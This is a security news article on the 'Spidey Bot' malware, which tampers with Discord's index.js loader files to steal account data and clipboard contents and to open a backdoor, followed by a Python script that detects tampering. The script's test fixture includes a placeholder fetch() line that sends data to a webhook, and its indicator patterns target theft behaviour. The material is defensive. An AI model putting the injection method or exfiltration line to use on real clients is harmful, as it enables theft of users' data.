A new malware attacks Discord users by turning the Windows Discord application into a backdoor and information-stealing Trojan.

The Windows Discord client is an Electron application, so almost all of its functionality comes from HTML, CSS and JavaScript. This allows malware to modify the client's core files so that the client runs malicious code whenever it starts.

The malware, called “Spidey Bot,” was discovered earlier this month by the researcher MalwareHunterTeam. It adds its own malicious JavaScript to the %AppData%\Discord\[version]\modules\discord_modules\index.js and %AppData%\Discord\[version]\modules\discord_core\index.js files.

Modified Discord index.js file

The malware then terminates and restarts the Discord application so that the JavaScript changes take effect.

Once started, the JavaScript executes various Discord API commands and JavaScript functions to collect a set of user information, which is then sent to the attacker via a Discord webhook.

Executing commands

The data gathered and forwarded to the attacker includes:

  • Discord account code.
  • Timezone of the victim.
  • Screen resolution.
  • Local IP address of the victim.
  • Public IP address of the victim via WebRTC.
  • Username, email address, telephone number and more details.
  • Whether payment information has been saved.
  • Zoom level.
  • Browser user agent.
  • Discord version.
  • The first 50 characters of the victim's Windows clipboard.

The clipboard contents are of particular concern, as they could allow the attacker to steal passwords, personal information or other sensitive data that the user has copied.

After the information is sent, the Discord malware executes the fightdio() function, which serves as a backdoor.

This function connects to a remote site to receive additional commands to execute. It allows the attacker to perform other malicious activities, including stealing payment information, executing commands on the device, or downloading additional malware if appropriate.

The backdoor component

Researcher and reverse engineer Vitali Kremez, who also examined the malware, said the infection has been seen using the file names “Blueface Reward Claimer.exe” and “Synapse X.exe.” While it is not 100 percent certain how it spreads, Kremez believes that the attacker is distributing the malware through Discord messages.

As the infection shows no outward signs, a user will not know they are infected unless they sniff their network traffic and notice the unusual API and webhook calls.

Even if the original installer is detected and removed, the modified Discord files remain infected and are executed every time the client starts. The only way to clean up the infection is to uninstall and reinstall the Discord software so that the modified files are replaced.
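Because the malicious code persists in the client's index.js loader files, those files can be checked directly. The script below is an added example, not code from the original article or from Discord: it assumes a clean loader is a short stub containing no URLs, and the size threshold, indicator patterns and sample directory tree are constructed for illustration.

```python
import os
import re
import tempfile
from pathlib import Path

# Assumption: a clean loader index.js is a tiny stub with no URLs or network code.
MAX_CLEAN_BYTES = 512  # hypothetical threshold, tune against a fresh install
INDICATORS = {
    "url": re.compile(r"https?://", re.I),            # any hard-coded remote site
    "webhook": re.compile(r"/api/webhooks/", re.I),   # Discord webhook endpoint path
    "webrtc": re.compile(r"RTCPeerConnection"),       # WebRTC public-IP lookup
    "clipboard": re.compile(r"clipboard", re.I),      # clipboard access
}

def inspect_index_js(path):
    """Return the reasons a loader file looks modified (empty list = nothing found)."""
    data = Path(path).read_bytes()
    text = data.decode("utf-8", errors="replace")
    reasons = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if len(data) > MAX_CLEAN_BYTES:
        reasons.append("oversized")
    return reasons

def scan_discord(appdata):
    """Check modules/*/index.js under every installed Discord version."""
    findings = {}
    for js in sorted(Path(appdata, "Discord").glob("*/modules/*/index.js")):
        reasons = inspect_index_js(js)
        if reasons:
            findings[str(js.relative_to(appdata))] = reasons
    return findings

def demo():
    """Scan a constructed fake %AppData% tree: one clean stub, one tampered file."""
    root = Path(tempfile.mkdtemp())
    mods = root / "Discord" / "0.0.0" / "modules"
    clean = mods / "module_a" / "index.js"
    bad = mods / "module_b" / "index.js"
    for p in (clean, bad):
        p.parent.mkdir(parents=True)
    clean.write_text("module.exports = require('./module_a.node');\n")
    bad.write_text("module.exports = require('./core');\n"
                   "fetch('https://discord.example/api/webhooks/0/PLACEHOLDER');\n")
    return scan_discord(root)

if __name__ == "__main__":
    for name, why in scan_discord(os.environ.get("APPDATA", ".")).items():
        print(name, why)
```

A flagged file is a reason to uninstall and reinstall the client, as described above; an empty result only means none of these indicators matched.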

Even worse, after more than two weeks, this Discord malware still has only 24/65 VirusTotal detections.
